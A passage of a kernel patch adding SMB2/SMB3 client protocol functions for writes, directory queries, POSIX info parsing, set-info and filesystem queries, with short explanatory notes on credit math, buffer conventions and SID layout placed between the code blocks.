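Editorial note on the credit math in smb2_async_writev() above (illustrative, not part of the patch): the function charges one credit per 64 KiB unit of the write (SMB2_MAX_BUFFER_SIZE) and then requests eight credits more than the charge so the server keeps the pipeline fed. A minimal sketch of the arithmetic, assuming the usual 64 KiB credit unit; example_write_credits() is a hypothetical helper, not a name from the patch:

#include <linux/kernel.h>	/* DIV_ROUND_UP */
#include <linux/printk.h>

/* illustrative fragment, not part of the patch */
static void example_write_credits(unsigned int bytes)
{
	unsigned int charge  = DIV_ROUND_UP(bytes, 65536);	/* SMB2_MAX_BUFFER_SIZE, assumed 64 KiB */
	unsigned int request = charge + 8;			/* mirrors smb2_async_writev() above */

	/* e.g. bytes = 196608 (192 KiB): charge = 3, request = 11 */
	pr_debug("charge=%u request=%u\n", charge, request);
}
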
++
++/*
++ * SMB2_write gets an iov pointer to a kvec array with n_vec as its length.
++ * n_vec must be at least 1 and counts the elements carrying data to write,
++ * which begin at position 1 in the iov array; iov[0] is reserved for the
++ * request header. The total data length is given by io_parms->length.
++ */
++int
++SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
++	   unsigned int *nbytes, struct kvec *iov, int n_vec)
++{
++	struct smb_rqst rqst;
++	int rc = 0;
++	struct smb2_write_req *req = NULL;
++	struct smb2_write_rsp *rsp = NULL;
++	int resp_buftype;
++	struct kvec rsp_iov;
++	int flags = 0;
++	unsigned int total_len;
++	struct TCP_Server_Info *server;
++
++	*nbytes = 0;
++
++	if (n_vec < 1)
++		return rc;
++
++	if (!io_parms->server)
++		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
++	server = io_parms->server;
++	if (server == NULL)
++		return -ECONNABORTED;
++
++	rc = smb2_plain_req_init(SMB2_WRITE, io_parms->tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(io_parms->tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
++
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
++	req->WriteChannelInfoOffset = 0;
++	req->WriteChannelInfoLength = 0;
++	req->Channel = 0;
++	req->Length = cpu_to_le32(io_parms->length);
++	req->Offset = cpu_to_le64(io_parms->offset);
++	req->DataOffset = cpu_to_le16(
++				offsetof(struct smb2_write_req, Buffer));
++	req->RemainingBytes = 0;
++
++	trace_smb3_write_enter(xid, io_parms->persistent_fid,
++		io_parms->tcon->tid, io_parms->tcon->ses->Suid,
++		io_parms->offset, io_parms->length);
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = n_vec + 1;
++
++	rc = cifs_send_recv(xid, io_parms->tcon->ses, server,
++			    &rqst,
++			    &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_write_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		trace_smb3_write_err(xid,
++				     req->PersistentFileId,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset, io_parms->length, rc);
++		cifs_stats_fail_inc(io_parms->tcon, SMB2_WRITE_HE);
++		cifs_dbg(VFS, "Send error in write = %d\n", rc);
++	} else {
++		*nbytes = le32_to_cpu(rsp->DataLength);
++		trace_smb3_write_done(xid,
++				      req->PersistentFileId,
++				      io_parms->tcon->tid,
++				      io_parms->tcon->ses->Suid,
++				      io_parms->offset, *nbytes);
++	}
++
++	cifs_small_buf_release(req);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
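
A hedged caller-side sketch of the kvec convention documented above: iov[0] is left empty for the request header that SMB2_write() fills in itself, and the n_vec payload vectors start at index 1. Here data_buf, data_len, xid and io_parms are assumed locals, not names from the patch:

unsigned int nbytes = 0;
struct kvec iov[2] = {};

iov[1].iov_base = data_buf;	/* assumed payload buffer */
iov[1].iov_len  = data_len;

rc = SMB2_write(xid, &io_parms, &nbytes, iov, 1 /* n_vec */);
if (!rc)
	cifs_dbg(FYI, "wrote %u bytes\n", nbytes);
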
++
++int posix_info_sid_size(const void *beg, const void *end)
++{
++	size_t subauth;
++	int total;
++
++	if (beg + 1 > end)
++		return -1;
++
++	subauth = *(u8 *)(beg+1);
++	if (subauth < 1 || subauth > 15)
++		return -1;
++
++	total = 1 + 1 + 6 + 4*subauth;
++	if (beg + total > end)
++		return -1;
++
++	return total;
++}
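
For orientation (not part of the patch): the on-wire SID validated above is one revision byte, one sub-authority count byte, a six-byte identifier authority, then four bytes per sub-authority. A small sketch with made-up buffer contents:

/* a SID with 5 sub-authorities, e.g. S-1-5-21-x-y-z-rid */
u8 sid[28] = { 1, 5, 0, 0, 0, 0, 0, 5 /* 20 sub-authority bytes follow */ };

/* returns 1 + 1 + 6 + 4 * 5 = 28 */
int len = posix_info_sid_size(sid, sid + sizeof(sid));
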
++
++int posix_info_parse(const void *beg, const void *end,
++		     struct smb2_posix_info_parsed *out)
++
++{
++	int total_len = 0;
++	int owner_len, group_len;
++	int name_len;
++	const void *owner_sid;
++	const void *group_sid;
++	const void *name;
++
++	/* if no end bound is given, assume the payload is correct */
++	if (!end) {
++		const struct smb2_posix_info *p = beg;
++
++		end = beg + le32_to_cpu(p->NextEntryOffset);
++		/* last element will have a 0 offset, pick a sensible bound */
++		if (end == beg)
++			end += 0xFFFF;
++	}
++
++	/* check base buf */
++	if (beg + sizeof(struct smb2_posix_info) > end)
++		return -1;
++	total_len = sizeof(struct smb2_posix_info);
++
++	/* check owner sid */
++	owner_sid = beg + total_len;
++	owner_len = posix_info_sid_size(owner_sid, end);
++	if (owner_len < 0)
++		return -1;
++	total_len += owner_len;
++
++	/* check group sid */
++	group_sid = beg + total_len;
++	group_len = posix_info_sid_size(group_sid, end);
++	if (group_len < 0)
++		return -1;
++	total_len += group_len;
++
++	/* check name len */
++	if (beg + total_len + 4 > end)
++		return -1;
++	name_len = le32_to_cpu(*(__le32 *)(beg + total_len));
++	if (name_len < 1 || name_len > 0xFFFF)
++		return -1;
++	total_len += 4;
++
++	/* check name */
++	name = beg + total_len;
++	if (name + name_len > end)
++		return -1;
++	total_len += name_len;
++
++	if (out) {
++		out->base = beg;
++		out->size = total_len;
++		out->name_len = name_len;
++		out->name = name;
++		memcpy(&out->owner, owner_sid, owner_len);
++		memcpy(&out->group, group_sid, group_len);
++	}
++	return total_len;
++}
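
A hedged sketch of how a consumer could walk a buffer of these variable-size entries, chaining on NextEntryOffset much like num_entries() further down; buf and buf_len are assumed to come from an already-validated response:

const void *p = buf, *end = buf + buf_len;
struct smb2_posix_info_parsed parsed;

while (p < end) {
	const struct smb2_posix_info *info = p;

	if (posix_info_parse(p, end, &parsed) < 0)
		break;				/* malformed entry */
	/* parsed.name / parsed.name_len now point into the buffer */
	if (!info->NextEntryOffset)
		break;				/* last entry in the chain */
	p += le32_to_cpu(info->NextEntryOffset);
}
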
++
++static int posix_info_extra_size(const void *beg, const void *end)
++{
++	int len = posix_info_parse(beg, end, NULL);
++
++	if (len < 0)
++		return -1;
++	return len - sizeof(struct smb2_posix_info);
++}
++
++static unsigned int
++num_entries(int infotype, char *bufstart, char *end_of_buf, char **lastentry,
++	    size_t size)
++{
++	int len;
++	unsigned int entrycount = 0;
++	unsigned int next_offset = 0;
++	char *entryptr;
++	FILE_DIRECTORY_INFO *dir_info;
++
++	if (bufstart == NULL)
++		return 0;
++
++	entryptr = bufstart;
++
++	while (1) {
++		if (entryptr + next_offset < entryptr ||
++		    entryptr + next_offset > end_of_buf ||
++		    entryptr + next_offset + size > end_of_buf) {
++			cifs_dbg(VFS, "malformed search entry would overflow\n");
++			break;
++		}
++
++		entryptr = entryptr + next_offset;
++		dir_info = (FILE_DIRECTORY_INFO *)entryptr;
++
++		if (infotype == SMB_FIND_FILE_POSIX_INFO)
++			len = posix_info_extra_size(entryptr, end_of_buf);
++		else
++			len = le32_to_cpu(dir_info->FileNameLength);
++
++		if (len < 0 ||
++		    entryptr + len < entryptr ||
++		    entryptr + len > end_of_buf ||
++		    entryptr + len + size > end_of_buf) {
++			cifs_dbg(VFS, "directory entry name would overflow frame end of buf %p\n",
++				 end_of_buf);
++			break;
++		}
++
++		*lastentry = entryptr;
++		entrycount++;
++
++		next_offset = le32_to_cpu(dir_info->NextEntryOffset);
++		if (!next_offset)
++			break;
++	}
++
++	return entrycount;
++}
++
++/*
++ * Readdir/FindFirst
++ */
++int SMB2_query_directory_init(const unsigned int xid,
++			      struct cifs_tcon *tcon,
++			      struct TCP_Server_Info *server,
++			      struct smb_rqst *rqst,
++			      u64 persistent_fid, u64 volatile_fid,
++			      int index, int info_level)
++{
++	struct smb2_query_directory_req *req;
++	unsigned char *bufptr;
++	__le16 asteriks = cpu_to_le16('*');
++	unsigned int output_size = CIFSMaxBufSize -
++		MAX_SMB2_CREATE_RESPONSE_SIZE -
++		MAX_SMB2_CLOSE_RESPONSE_SIZE;
++	unsigned int total_len;
++	struct kvec *iov = rqst->rq_iov;
++	int len, rc;
++
++	rc = smb2_plain_req_init(SMB2_QUERY_DIRECTORY, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	switch (info_level) {
++	case SMB_FIND_FILE_DIRECTORY_INFO:
++		req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
++		break;
++	case SMB_FIND_FILE_POSIX_INFO:
++		req->FileInformationClass = SMB_FIND_FILE_POSIX_INFO;
++		break;
++	default:
++		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
++			info_level);
++		return -EINVAL;
++	}
++
++	req->FileIndex = cpu_to_le32(index);
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++
++	len = 0x2;
++	bufptr = req->Buffer;
++	memcpy(bufptr, &asteriks, len);
++
++	req->FileNameOffset =
++		cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1);
++	req->FileNameLength = cpu_to_le16(len);
++	/*
++	 * BB could be 30 bytes or so longer if we used SMB2 specific
++	 * buffer lengths, but this is safe and close enough.
++	 */
++	output_size = min_t(unsigned int, output_size, server->maxBuf);
++	output_size = min_t(unsigned int, output_size, 2 << 15);
++	req->OutputBufferLength = cpu_to_le32(output_size);
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1;
++
++	iov[1].iov_base = (char *)(req->Buffer);
++	iov[1].iov_len = len;
++
++	trace_smb3_query_dir_enter(xid, persistent_fid, tcon->tid,
++			tcon->ses->Suid, index, output_size);
++
++	return 0;
++}
++
++void SMB2_query_directory_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov) {
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++	}
++}
++
++int
++smb2_parse_query_directory(struct cifs_tcon *tcon,
++			   struct kvec *rsp_iov,
++			   int resp_buftype,
++			   struct cifs_search_info *srch_inf)
++{
++	struct smb2_query_directory_rsp *rsp;
++	size_t info_buf_size;
++	char *end_of_smb;
++	int rc;
++
++	rsp = (struct smb2_query_directory_rsp *)rsp_iov->iov_base;
++
++	switch (srch_inf->info_level) {
++	case SMB_FIND_FILE_DIRECTORY_INFO:
++		info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
++		break;
++	case SMB_FIND_FILE_POSIX_INFO:
++		/* note that posix payloads are variable size */
++		info_buf_size = sizeof(struct smb2_posix_info);
++		break;
++	default:
++		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
++			 srch_inf->info_level);
++		return -EINVAL;
++	}
++
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength), rsp_iov,
++			       info_buf_size);
++	if (rc) {
++		cifs_tcon_dbg(VFS, "bad info payload");
++		return rc;
++	}
++
++	srch_inf->unicode = true;
++
++	if (srch_inf->ntwrk_buf_start) {
++		if (srch_inf->smallBuf)
++			cifs_small_buf_release(srch_inf->ntwrk_buf_start);
++		else
++			cifs_buf_release(srch_inf->ntwrk_buf_start);
++	}
++	srch_inf->ntwrk_buf_start = (char *)rsp;
++	srch_inf->srch_entries_start = srch_inf->last_entry =
++		(char *)rsp + le16_to_cpu(rsp->OutputBufferOffset);
++	end_of_smb = rsp_iov->iov_len + (char *)rsp;
++
++	srch_inf->entries_in_buffer = num_entries(
++		srch_inf->info_level,
++		srch_inf->srch_entries_start,
++		end_of_smb,
++		&srch_inf->last_entry,
++		info_buf_size);
++
++	srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
++	cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
++		 srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
++		 srch_inf->srch_entries_start, srch_inf->last_entry);
++	if (resp_buftype == CIFS_LARGE_BUFFER)
++		srch_inf->smallBuf = false;
++	else if (resp_buftype == CIFS_SMALL_BUFFER)
++		srch_inf->smallBuf = true;
++	else
++		cifs_tcon_dbg(VFS, "Invalid search buffer type\n");
++
++	return 0;
++}
++
++int
++SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid, int index,
++		     struct cifs_search_info *srch_inf)
++{
++	struct smb_rqst rqst;
++	struct kvec iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
++	struct smb2_query_directory_rsp *rsp = NULL;
++	int resp_buftype = CIFS_NO_BUFFER;
++	struct kvec rsp_iov;
++	int rc = 0;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = 0;
++
++	if (!ses || !(ses->server))
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
++
++	rc = SMB2_query_directory_init(xid, tcon, server,
++				       &rqst, persistent_fid,
++				       volatile_fid, index,
++				       srch_inf->info_level);
++	if (rc)
++		goto qdir_exit;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_query_directory_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		if (rc == -ENODATA &&
++		    rsp->hdr.Status == STATUS_NO_MORE_FILES) {
++			trace_smb3_query_dir_done(xid, persistent_fid,
++				tcon->tid, tcon->ses->Suid, index, 0);
++			srch_inf->endOfSearch = true;
++			rc = 0;
++		} else {
++			trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
++				tcon->ses->Suid, index, 0, rc);
++			cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
++		}
++		goto qdir_exit;
++	}
++
++	rc = smb2_parse_query_directory(tcon, &rsp_iov, resp_buftype,
++					srch_inf);
++	if (rc) {
++		trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
++			tcon->ses->Suid, index, 0, rc);
++		goto qdir_exit;
++	}
++	resp_buftype = CIFS_NO_BUFFER;
++
++	trace_smb3_query_dir_done(xid, persistent_fid, tcon->tid,
++			tcon->ses->Suid, index, srch_inf->entries_in_buffer);
++
++qdir_exit:
++	SMB2_query_directory_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int
++SMB2_set_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		   struct smb_rqst *rqst,
++		   u64 persistent_fid, u64 volatile_fid, u32 pid,
++		   u8 info_class, u8 info_type, u32 additional_info,
++		   void **data, unsigned int *size)
++{
++	struct smb2_set_info_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int i, total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_SET_INFO, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
++	req->InfoType = info_type;
++	req->FileInfoClass = info_class;
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	req->AdditionalInformation = cpu_to_le32(additional_info);
++
++	req->BufferOffset =
++			cpu_to_le16(sizeof(struct smb2_set_info_req) - 1);
++	req->BufferLength = cpu_to_le32(*size);
++
++	memcpy(req->Buffer, *data, *size);
++	total_len += *size;
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1;
++
++	for (i = 1; i < rqst->rq_nvec; i++) {
++		le32_add_cpu(&req->BufferLength, size[i]);
++		iov[i].iov_base = (char *)data[i];
++		iov[i].iov_len = size[i];
++	}
++
++	return 0;
++}
++
++void
++SMB2_set_info_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++static int
++send_set_info(const unsigned int xid, struct cifs_tcon *tcon,
++	       u64 persistent_fid, u64 volatile_fid, u32 pid, u8 info_class,
++	       u8 info_type, u32 additional_info, unsigned int num,
++		void **data, unsigned int *size)
++{
++	struct smb_rqst rqst;
++	struct smb2_set_info_rsp *rsp = NULL;
++	struct kvec *iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = 0;
++
++	if (!ses || !server)
++		return -EIO;
++
++	if (!num)
++		return -EINVAL;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	iov = kmalloc_array(num, sizeof(struct kvec), GFP_KERNEL);
++	if (!iov)
++		return -ENOMEM;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = num;
++
++	rc = SMB2_set_info_init(tcon, server,
++				&rqst, persistent_fid, volatile_fid, pid,
++				info_class, info_type, additional_info,
++				data, size);
++	if (rc) {
++		kfree(iov);
++		return rc;
++	}
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags,
++			    &rsp_iov);
++	SMB2_set_info_free(&rqst);
++	rsp = (struct smb2_set_info_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_SET_INFO_HE);
++		trace_smb3_set_info_err(xid, persistent_fid, tcon->tid,
++				ses->Suid, info_class, (__u32)info_type, rc);
++	}
++
++	free_rsp_buf(resp_buftype, rsp);
++	kfree(iov);
++	return rc;
++}
++
++int
++SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
++	     u64 volatile_fid, u32 pid, __le64 *eof)
++{
++	struct smb2_file_eof_info info;
++	void *data;
++	unsigned int size;
++
++	info.EndOfFile = *eof;
++
++	data = &info;
++	size = sizeof(struct smb2_file_eof_info);
++
++	trace_smb3_set_eof(xid, persistent_fid, tcon->tid, tcon->ses->Suid, le64_to_cpu(*eof));
++
++	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
++			pid, FILE_END_OF_FILE_INFORMATION, SMB2_O_INFO_FILE,
++			0, 1, &data, &size);
++}
++
++int
++SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid,
++		struct cifs_ntsd *pnntsd, int pacllen, int aclflag)
++{
++	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
++			current->tgid, 0, SMB2_O_INFO_SECURITY, aclflag,
++			1, (void **)&pnntsd, &pacllen);
++}
++
++int
++SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
++	    u64 persistent_fid, u64 volatile_fid,
++	    struct smb2_file_full_ea_info *buf, int len)
++{
++	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
++		current->tgid, FILE_FULL_EA_INFORMATION, SMB2_O_INFO_FILE,
++		0, 1, (void **)&buf, &len);
++}
++
++int
++SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
++		  const u64 persistent_fid, const u64 volatile_fid,
++		  __u8 oplock_level)
++{
++	struct smb_rqst rqst;
++	int rc;
++	struct smb2_oplock_break *req = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = CIFS_OBREAK_OP;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	cifs_dbg(FYI, "SMB2_oplock_break\n");
++	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->VolatileFid = volatile_fid;
++	req->PersistentFid = persistent_fid;
++	req->OplockLevel = oplock_level;
++	req->hdr.CreditRequest = cpu_to_le16(1);
++
++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
++		cifs_dbg(FYI, "Send error in Oplock Break = %d\n", rc);
++	}
++
++	return rc;
++}
++
++void
++smb2_copy_fs_info_to_kstatfs(struct smb2_fs_full_size_info *pfs_inf,
++			     struct kstatfs *kst)
++{
++	kst->f_bsize = le32_to_cpu(pfs_inf->BytesPerSector) *
++			  le32_to_cpu(pfs_inf->SectorsPerAllocationUnit);
++	kst->f_blocks = le64_to_cpu(pfs_inf->TotalAllocationUnits);
++	kst->f_bfree  = kst->f_bavail =
++			le64_to_cpu(pfs_inf->CallerAvailableAllocationUnits);
++	return;
++}
++
++static void
++copy_posix_fs_info_to_kstatfs(FILE_SYSTEM_POSIX_INFO *response_data,
++			struct kstatfs *kst)
++{
++	kst->f_bsize = le32_to_cpu(response_data->BlockSize);
++	kst->f_blocks = le64_to_cpu(response_data->TotalBlocks);
++	kst->f_bfree =  le64_to_cpu(response_data->BlocksAvail);
++	if (response_data->UserBlocksAvail == cpu_to_le64(-1))
++		kst->f_bavail = kst->f_bfree;
++	else
++		kst->f_bavail = le64_to_cpu(response_data->UserBlocksAvail);
++	if (response_data->TotalFileNodes != cpu_to_le64(-1))
++		kst->f_files = le64_to_cpu(response_data->TotalFileNodes);
++	if (response_data->FreeFileNodes != cpu_to_le64(-1))
++		kst->f_ffree = le64_to_cpu(response_data->FreeFileNodes);
++
++	return;
++}
++
++static int
++build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
++		   struct TCP_Server_Info *server,
++		   int level, int outbuf_len, u64 persistent_fid,
++		   u64 volatile_fid)
++{
++	int rc;
++	struct smb2_query_info_req *req;
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "Query FSInfo level %d\n", level);
++
++	if ((tcon->ses == NULL) || server == NULL)
++		return -EIO;
++
++	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->InfoType = SMB2_O_INFO_FILESYSTEM;
++	req->FileInfoClass = level;
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	/* 1 for pad */
++	req->InputBufferOffset =
++			cpu_to_le16(sizeof(struct smb2_query_info_req) - 1);
++	req->OutputBufferLength = cpu_to_le32(
++		outbuf_len + sizeof(struct smb2_query_info_rsp) - 1);
++
++	iov->iov_base = (char *)req;
++	iov->iov_len = total_len;
++	return 0;
++}
++
++int
++SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
++	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	FILE_SYSTEM_POSIX_INFO *info = NULL;
++	int flags = 0;
++
++	rc = build_qfs_info_req(&iov, tcon, server,
++				FS_POSIX_INFORMATION,
++				sizeof(FILE_SYSTEM_POSIX_INFO),
++				persistent_fid, volatile_fid);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = &iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(iov.iov_base);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		goto posix_qfsinf_exit;
++	}
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	info = (FILE_SYSTEM_POSIX_INFO *)(
++		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
++			       sizeof(FILE_SYSTEM_POSIX_INFO));
++	if (!rc)
++		copy_posix_fs_info_to_kstatfs(info, fsdata);
++
++posix_qfsinf_exit:
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
++	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct smb2_fs_full_size_info *info = NULL;
++	int flags = 0;
++
++	rc = build_qfs_info_req(&iov, tcon, server,
++				FS_FULL_SIZE_INFORMATION,
++				sizeof(struct smb2_fs_full_size_info),
++				persistent_fid, volatile_fid);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = &iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(iov.iov_base);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		goto qfsinf_exit;
++	}
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	info = (struct smb2_fs_full_size_info *)(
++		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
++			       sizeof(struct smb2_fs_full_size_info));
++	if (!rc)
++		smb2_copy_fs_info_to_kstatfs(info, fsdata);
++
++qfsinf_exit:
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
++	      u64 persistent_fid, u64 volatile_fid, int level)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype, max_len, min_len;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	unsigned int rsp_len, offset;
++	int flags = 0;
++
++	if (level == FS_DEVICE_INFORMATION) {
++		max_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
++		min_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
++	} else if (level == FS_ATTRIBUTE_INFORMATION) {
++		max_len = sizeof(FILE_SYSTEM_ATTRIBUTE_INFO);
++		min_len = MIN_FS_ATTR_INFO_SIZE;
++	} else if (level == FS_SECTOR_SIZE_INFORMATION) {
++		max_len = sizeof(struct smb3_fs_ss_info);
++		min_len = sizeof(struct smb3_fs_ss_info);
++	} else if (level == FS_VOLUME_INFORMATION) {
++		max_len = sizeof(struct smb3_fs_vol_info) + MAX_VOL_LABEL_LEN;
++		min_len = sizeof(struct smb3_fs_vol_info);
++	} else {
++		cifs_dbg(FYI, "Invalid qfsinfo level %d\n", level);
++		return -EINVAL;
++	}
++
++	rc = build_qfs_info_req(&iov, tcon, server,
++				level, max_len,
++				persistent_fid, volatile_fid);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = &iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(iov.iov_base);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		goto qfsattr_exit;
++	}
